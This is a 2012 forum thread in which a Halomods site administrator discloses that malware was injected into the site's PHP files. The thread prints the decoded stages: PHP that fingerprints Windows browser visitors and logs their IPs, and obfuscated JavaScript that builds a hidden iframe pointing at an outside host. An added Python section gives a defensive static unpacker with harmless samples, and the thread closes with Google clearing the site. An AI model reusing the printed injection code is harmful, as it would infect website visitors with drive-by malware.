Halomods Community Portal: About the recent 'malware' flagging of HM - Halomods Community Portal



About the recent 'malware' flagging of HM

Yes we're addressing the issue, while playing many hours of Halo 4

#1 kornman00

  • SourceGuy 2.0
  • Group: Administrators
  • Joined: 15-November 01


Posted 14 November 2012 - 10:57 AM

So, somehow our systems were compromised by a Belgian entity (I'm not going to point fingers, but we're betting they're made of jelly and umad) and an automated script was run where our major .php files had a block of foreign code injected in them. They (well, -it-, there was only one variant of the script injected) were in gzinflate/base64 format (you can use this to decode)

(TL;DR, here's a lovely StackOverflow entry on this nonsense)

(NOTE: Excuse the horrible styling in the code text below...we didn't test that part of the Halomods theme yet...consider it on the TODO list, after getting the site unfucked)

From the injected php:
eval(gzinflate(base64_decode('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')));


Decode round one (php):
if (!isset($ftl)){ global $ftl;$ftl=1;	$ip=$_SERVER['REMOTE_ADDR'];$dr=$_SERVER['DOCUMENT_ROOT'];$ua = $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5(date('m.d.y'));$odbf = $dr.'/'.md5(date('m.d.y'),time()-86400);	if (file_exists($odbf))@unlink($odbf);	if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Firefox')!==false||(strpos($ua,'Opera')!==false))&&(strpos(@file_get_contents($dbf),$ip) === false))){		error_reporting(0);		print(gzinflate(base64_decode('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')));		if ($fp = @fopen($dbf , 'a')){fputs($fp , $ip.'|'); fclose($fp);}	}}


Decode round two (html/js):
<script>try{if(window.document)window["document"]["body"]="123"}catch(bawetawe){if(window.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["body"]="123"}catch(gfdnfdgber){m=123;if((alert+"").indexOf("na"+"ti"+"ve")!==-1)ev=window["eval"];}}n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1g","4n","d","9","9","9","45","42","4e","3m","49","41","4e","1f","1g","29","d","9","9","50","17","41","48","4f","41","17","4n","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","4j","4e","45","4g","41","1f","19","2a","45","42","4e","3m","49","41","17","4f","4e","3o","2b","1e","44","4g","4g","4c","28","1m","1m","40","41","4a","4f","41","4c","4e","4b","49","45","4f","4f","4b","4e","4l","1l","45","4a","42","4b","1m","4g","1m","4i","3o","1l","4c","44","4c","2d","43","4b","2b","20","1e","17","4j","45","40","4g","44","2b","1e","1o","1n","1e","17","44","41","45","43","44","4g","2b","1e","1o","1n","1e","17","4f","4g","4l","48","41","2b","1e","4i","45","4f","45","3n","45","48","45","4g","4l","28","44","45","40","40","41","4a","29","4c","4b","4f","45","4g","45","4b","4a","28","3m","3n","4f","4b","48","4h","4g","41","29","48","41","42","4g","28","1n","29","4g","4b","4c","28","1n","29","1e","2c","2a","1m","45","42","4e","3m","49","41","2c","19","1g","29","d","9","9","50","d","9","9","42","4h","4a","3o","4g","45","4b","4a","17","45","42","4e","3m","49","41","4e","1f","1g","4n","d","9","9","9","4i","3m","4e","17","42","17","2b","17","40","4b","3o","4h","49","41","4a","4g","1l","3o","4e","41","3m","4g","41","2j","48","41","49","41","4a","4g","1f","1e","45","42","4e","3m","49","41","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4f","4e","3o","1e","1j","1e","44","4g","4g","4c","28","1m","1m","40","41","4a
","4f","41","4c","4e","4b","49","45","4f","4f","4b","4e","4l","1l","45","4a","42","4b","1m","4g","1m","4i","3o","1l","4c","44","4c","2d","43","4b","2b","20","1e","1g","29","42","1l","4f","4g","4l","48","41","1l","4i","45","4f","45","3n","45","48","45","4g","4l","2b","1e","44","45","40","40","41","4a","1e","29","42","1l","4f","4g","4l","48","41","1l","4c","4b","4f","45","4g","45","4b","4a","2b","1e","3m","3n","4f","4b","48","4h","4g","41","1e","29","42","1l","4f","4g","4l","48","41","1l","48","41","42","4g","2b","1e","1n","1e","29","42","1l","4f","4g","4l","48","41","1l","4g","4b","4c","2b","1e","1n","1e","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4j","45","40","4g","44","1e","1j","1e","1o","1n","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];h=2;s="";if(m)for(i=0;i-591!=0;i++){k=i;if(window["document"])s+=String["fro"+"mC"+"harCode"](parseInt(n[i],25));}z=s;ev(z)}}}</script>


Note, that last bit MS Security Essentials will zap from your computer if it even gets a whiff of it as/in a file on your computer.

I'm sure the spambots that were managing to make posts weren't helping with Google's analysis either. But we've addressed that and made strides to fix future issues with them.

This is why we can't have nice things
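Added example (not from the post or the Halomods code base): a static unpacker for the two layers kornman00 describes, written the way an incident responder would peel them without ever executing the payload. The PHP layer is peeled with base64 plus raw DEFLATE (PHP's gzinflate has no zlib header, hence wbits=-15) and followed down through nested eval/print wrappers; the JavaScript layer is rebuilt by converting each element of the numeric array with the radix the script passes to parseInt (25 in the sample above). It also derives the name of the per-day visitor list stage one writes to DOCUMENT_ROOT (md5 of date('m.d.y')), which is a useful thing to look for on the web root. The samples inside the block are constructed and harmless (an echo and a title assignment), not the real blobs, which are truncated on the page.

```python
"""Static unpacker for the two obfuscation layers in the post (added example).

 1. PHP  eval(gzinflate(base64_decode('...')))  possibly nested, or print(...)
 2. JS   n=["..",".."]; ... String.fromCharCode(parseInt(n[i], RADIX))

Nothing is evaluated: the layers are peeled with base64/zlib and int(x, radix).
"""
import base64
import hashlib
import re
import zlib
from datetime import date

# eval(...) is the outer injected layer; stage one uses print(...) for the HTML/JS payload.
_PHP_LAYER = re.compile(
    r"(?:eval|print)\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)\s*\)",
    re.S,
)
_JS_RADIX = re.compile(r"parseInt\(\s*\w+\[\s*\w+\s*\]\s*,\s*(\d+)\s*\)")
_JS_ARRAY = re.compile(r'\b\w+\s*=\s*\[((?:\s*"[0-9a-z]+"\s*,?)+)\]')


def find_php_layers(source: str) -> list:
    """Base64 blobs of every eval/print(gzinflate(base64_decode('...'))) in a PHP source."""
    return _PHP_LAYER.findall(source)


def unpack_php_layer(blob: str) -> str:
    """Decode one base64 + raw-DEFLATE blob to text; wbits=-15 matches PHP gzinflate()."""
    return zlib.decompress(base64.b64decode(blob), -15).decode("latin-1")


def peel_php(source: str, max_depth: int = 10) -> list:
    """Follow the first wrapper at each level; returns decoded stages, innermost last."""
    stages = []
    current = source
    for _ in range(max_depth):
        blobs = find_php_layers(current)
        if not blobs:
            break
        current = unpack_php_layer(blobs[0])
        stages.append(current)
    return stages


def decode_js_array(js: str) -> str:
    """Rebuild the string stage two feeds to eval(): chr(int(element, radix)) per element."""
    radix_match = _JS_RADIX.search(js)
    array_match = _JS_ARRAY.search(js)
    if not radix_match or not array_match:
        raise ValueError("no parseInt(n[i], radix) / string-array pair found")
    radix = int(radix_match.group(1))
    items = re.findall(r'"([0-9a-z]+)"', array_match.group(1))
    return "".join(chr(int(x, radix)) for x in items)


def tracking_marker_name(year: int, month: int, day: int) -> str:
    """Per-day visitor list stage one appends IPs to: DOCUMENT_ROOT/md5(date('m.d.y'))."""
    return hashlib.md5(date(year, month, day).strftime("%m.%d.%y").encode()).hexdigest()


# --- constructed sample data (harmless stand-ins for the truncated blobs on the page) ---
def _deflate_b64(text: str) -> str:
    """Build a layer the way the injector did (gzdeflate + base64); sample construction only."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(c.compress(text.encode()) + c.flush()).decode()


def _to_base(n: int, radix: int) -> str:
    digits = "0123456789abcdefghijklmnopqrstuvwxyz"
    out = ""
    while True:
        out = digits[n % radix] + out
        n //= radix
        if n == 0:
            return out


INNER_PHP = "echo 'stage two';"
STAGE1_PHP = "if(!isset($ftl)){print(gzinflate(base64_decode('" + _deflate_b64(INNER_PHP) + "')));}"
INJECTED_PHP = "<?php eval(gzinflate(base64_decode('" + _deflate_b64(STAGE1_PHP) + "')));"
INNER_JS = 'document.title="demo";'
SAMPLE_JS = (
    "n=[" + ",".join('"%s"' % _to_base(ord(ch), 25) for ch in INNER_JS) + "];"
    'for(i=0;i<n.length;i++){s+=String["fro"+"mC"+"harCode"](parseInt(n[i],25));}ev(s)'
)

if __name__ == "__main__":
    for depth, stage in enumerate(peel_php(INJECTED_PHP), 1):
        print("php stage %d: %s" % (depth, stage))
    print("js payload:", decode_js_array(SAMPLE_JS))
    today = date.today()
    print("today's marker file:", tracking_marker_name(today.year, today.month, today.day))
```

Point find_php_layers/peel_php at each .php file on the server to locate and unpack the injected blocks; anything that decodes to a browser-targeting print() stage or writes a marker file under the web root is worth quarantining. The marker file name changes daily, so check both today's and yesterday's names (stage one deletes the previous day's file itself).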

#2 kornman00

  • SourceGuy 2.0
  • Group: Administrators
  • Joined: 15-November 01


Posted 15 November 2012 - 04:49 AM

Google said:

Status of the latest badware review for this site: A review for this site has finished. The site was found clean. The badware warnings from web search are being removed. Please note that it can take some time for this change to propagate.

